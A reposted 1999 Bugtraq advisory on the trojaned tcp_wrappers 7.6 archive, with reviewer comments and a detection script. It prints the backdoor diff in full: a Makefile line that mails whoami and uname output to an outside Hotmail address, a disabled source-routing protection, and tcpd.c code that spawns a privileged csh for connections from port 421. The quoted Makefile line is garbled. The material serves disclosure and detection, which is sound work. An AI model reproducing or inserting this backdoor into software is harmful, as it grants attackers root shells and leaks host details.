
Tampered Source Code of the TCPWRAPPER Program

Contributed by: José Vicente Machado Filho

Publication date: 25 January 1999

The TCPWRAPPER source distribution was trojaned (a backdoor was inserted into the archive on its official FTP site), and several people downloaded the altered version before it was restored.

The e-mail below contains the full description of the problem, as published by Wietse Venema himself.

José Vicente Machado Filho, Support Analyst

Modulo Security Solutions S.A. http://www.modulo.com.br

  -----Original Message-----
  From: Wietse Venema <wietse@PORCUPINE.ORG>
  To: BUGTRAQ@netspace.org <BUGTRAQ@netspace.org>
  Date: Thursday, 21 January 1999 18:34
  Subject: [S] backdoored tcp wrapper source code
  
  
  >TCP Wrappers is a widely-used security tool to protect UNIX systems
  >against intrusion. It has an estimated installed base of millions.
  >
  >Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
  >a backdoored version. Eventually this was bound to happen, and
  >that's why the source file is accompanied by a PGP signature.  But
  >that is no guarantee against people downloading and installing
  >backdoored software.
  >
  >The backdoor gives access to a privileged shell when a client
  >connects from port 421.
  >
  >The backdoored copy was downloaded 52 times between 07:16 MET and
  >16:29 MET. I have informed the sites that downloaded a copy.
  >
  >Below are details on how to recognize the backdoored version.
  >
  >        Wietse
  >
  >Relevant time stamp/size information (times relative to MET):
  >
  >Backdoored version:
  >
  >    % ls -lcta
  >    -r--r--r--  1 wswietse    99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
  >    ...
  >    dr-xr-sr-x  3 wswietse     4096 Apr 11  1998 .
  >
  >Restored version:
  >
  >    % ls -lt tcp_wrappers_7.6.tar.gz
  >    -r--r--r--  1 wswietse    99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz
  >
  >The signature of the bad TAR file is: length 99186 instead of 99438.
  >The signature of a compiled tcpd binary is:
  >
  >    strings -a tcpd | grep csh
  >
  >any output probably means trouble.
  >
  >Changes that were made to the tcp wrapper 7.6 source code:
  >
  >diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
  >*** 7.6/Makefile        Mon Apr  7 20:34:16 1997
  >--- /tmp/tcp_wrappers_7.6/Makefile      Fri Mar 21 13:27:21 1997
  >***************
  >*** 26,31 ****
  >--- 26,32 ----
  >        @echo
  >        @echo "If none of these match your environment, edit the system"
  >        @echo "dependencies sections in the Makefile and do a 'make
  other'."
  >+       @sh -c écho debug-""whoami""-""uname -a"" |mail -s debug
  wtcpd@hotmail.com'
  >        @echo
  >
  >  ###########################################################
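Review bot: the added `@sh -c ... |mail -s debug wtcpd@hotmail.com'` line in the usage target phones home. Every time the default target prints this "If none of these match your environment" text, the output of `whoami` and `uname -a` is mailed to an external Hotmail address, handing the attacker a list of hosts and accounts that built the package. A usage target whose other lines are all `@echo` has no business running `sh -c` or `mail`; remove the line and grep any unpacked 7.6 tree for `mail` or `hotmail`. The archived copy of the line is mangled (the opening quote after `-c` and the backticks around `whoami` and `uname -a` did not survive extraction), so diff against the restored archive rather than this text. Note also the file headers: the trojaned Makefile carries an mtime (Fri Mar 21 1997) older than the genuine one (Mon Apr 7 1997), so timestamps were set deliberately and cannot be used to detect the swap.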
  >***************
  >*** 649,655 ****
  >  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  >  # Solaris 2.x, and Linux. See your system documentation for details.
  >  #
  >! KILL_OPT= -DKILL_IP_OPTIONS
  >
  >  ## End configuration options
  >  ############################
  >--- 650,656 ----
  >  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  >  # Solaris 2.x, and Linux. See your system documentation for details.
  >  #
  >! # KILL_OPT= -DKILL_IP_OPTIONS
  >
  >  ## End configuration options
  >  ############################
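Review bot: commenting out `KILL_OPT= -DKILL_IP_OPTIONS` silently disables the IP-options (source-routing) protection that the comment directly above describes as optional only where the kernel already enforces it, and nothing in the patch explains why. A genuine 7.6 change would not turn off a hardening option in the `## End configuration options` block without a note; the only beneficiary is an attacker who wants source-routed connections to reach tcpd. Treat a 7.6 Makefile with this line commented out as a second indicator alongside the archive length, and restore `KILL_OPT= -DKILL_IP_OPTIONS` on the platforms that need it.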
  >Only in 7.6: Makefile-
  >diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
  >*** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
  >--- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
  >***************
  >*** 41,52 ****
  >--- 41,63 ----
  >  int     allow_severity = SEVERITY;    /* run-time adjustable */
  >  int     deny_severity = LOG_WARNING;  /* ditto */
  >
  >+ char    IDENT[]="NC421\n";
  >+ char    SRUN[]="-csh";
  >+ char    SPATH[]="/bin/csh";
  >+ #define PORT 421
  >+
  >  main(argc, argv)
  >  int     argc;
  >  char  **argv;
  >  {
  >      struct request_info request;
  >+     struct sockaddr_in from;
  >      char    path[MAXPATHNAMELEN];
  >+     int     fromlen;
  >+
  >+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
  >+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
  >+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}
  >
  >      /* Attempt to prevent the creation of world-writable files. */
  >
  


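The two quick checks Wietse gives in the post above (the archive length of 99438 versus 99186 bytes, and `strings -a tcpd | grep csh` on a compiled binary) wrapped into one script, as an added example that is not part of the original post or of the tcp_wrappers sources. It assumes only POSIX sh, tr, awk, grep and wc; the `strings` step is emulated with tr/awk so the check also works on a host without binutils, and the two archive lengths are the values from the post.

```shell
#!/bin/sh
# Added example, not from Wietse Venema's post or the tcp_wrappers sources:
# applies the two indicators the post gives for the 21 Jan 1999 swap of
# tcp_wrappers_7.6.tar.gz on ftp.win.tue.nl.

GOOD_SIZE=99438   # restored archive length, from the post
BAD_SIZE=99186    # backdoored archive length, from the post

# Printable runs of 4+ characters, the same thing "strings -a" prints,
# done with tr/awk so the check works without binutils installed.
printable_runs() {
    tr -c '[:print:]' '\n' < "$1" | awk 'length($0) >= 4'
}

# check_tarball FILE: returns 0 if the size matches the restored archive,
# 1 if it matches the backdoored one, 2 if neither (then verify the PGP
# signature; a size match alone proves nothing about a third variant).
check_tarball() {
    size=$(wc -c < "$1" | tr -d ' ')
    if [ "$size" -eq "$GOOD_SIZE" ]; then
        echo "$1: $size bytes, matches the restored tcp_wrappers_7.6.tar.gz"
        return 0
    elif [ "$size" -eq "$BAD_SIZE" ]; then
        echo "$1: $size bytes, matches the BACKDOORED archive"
        return 1
    fi
    echo "$1: $size bytes, matches neither known length; check the PGP signature"
    return 2
}

# check_tcpd BINARY: returns 0 if no string containing "csh" is present,
# 1 otherwise. The backdoor embeds "-csh" and "/bin/csh"; a clean tcpd has
# no reference to csh at all.
check_tcpd() {
    hits=$(printable_runs "$1" | grep -c csh || true)
    if [ "$hits" -eq 0 ]; then
        echo "$1: no csh strings, consistent with a clean build"
        return 0
    fi
    echo "$1: $hits csh string(s) found, probably trouble:"
    printable_runs "$1" | grep csh | sed 's/^/    /'
    return 1
}

# main ARCHIVE [TCPD]: run whichever checks the arguments allow; non-zero
# if any check fails.
main() {
    rc=0
    check_tarball "$1" || rc=1
    if [ $# -ge 2 ]; then
        check_tcpd "$2" || rc=1
    fi
    return $rc
}

# Usage: sh check_tcpw.sh tcp_wrappers_7.6.tar.gz [tcpd]
if [ $# -gt 0 ]; then
    main "$@"
else
    echo "usage: $0 tcp_wrappers_7.6.tar.gz [tcpd]" >&2
fi
```

Both checks are only the cheap indicators from the post. The definitive test for the archive is the PGP signature that accompanies it on the FTP site; the length comparison catches this one swap, and the `csh` grep catches this one backdoor, not a variant that picks another shell or another trigger.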